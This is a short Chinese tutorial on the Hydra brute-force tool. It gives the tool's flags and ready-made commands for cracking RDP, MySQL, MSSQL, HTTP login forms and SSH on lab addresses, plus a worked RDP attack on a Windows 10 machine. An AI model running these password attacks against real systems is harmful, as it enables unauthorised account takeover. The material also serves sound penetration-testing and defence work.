hydra暴力破解使用

hydra是一个常见的密码安全测试工具(爆破工具)，在kali系统中自带，在windows下也是可以使用的。

windows版本下载地址：https://github.com/maaaaz/thc-hydra-windows

安装

下载之后解压，然后在解压后的文件夹里面打开命令行，查看命令的帮助

常用命令

常见参数解释

hydra
-L 账户字典
-l 单个账户名
-p 单个密码
-P 密码字典

# hydra爆破rdp：（前提是目标的远程连接可以访问）
hydra -l Administrator -P password.txt rdp://192.168.1.111   

# hydra爆破mysql:（前提是目标的mysql可远程访问）
hydra -l root -P password.txt 192.168.1.111 mysql

# hydra爆破sql server:（前提是目标的mysql可远程访问）
hydra -l sa -P password.txt 192.168.1.111 mssql

# hydra爆破http：( http-get or http-form-post.)
hydra -l admin -P password.txt 192.168.1.111 http-get /login.php
hydra -l admin -P password.txt 192.168.213.135 http-form-post "/dvwa/login.php:user=^USER^&pass=^PASS^:<title>invalide</title"

# hydra爆破ssh：( 前提是目标的远程连接可以访问)
hydra -l root -P password.txt 192.168.1.111 ssh

注意事项：

1、字典路径为全英文且不能空格；

2、做测试的时候要确保目标可访问；

3、所有符号均为英文状态下输入；

实战

针对一台window10的电脑，此电脑rdp服务已经开启。

hydra.exe -l admin -p top19576.txt rdp://192.168.173.130

爆破成功后，密码就可以得到了

查看windows登录日志，可以查看暴力破解的痕迹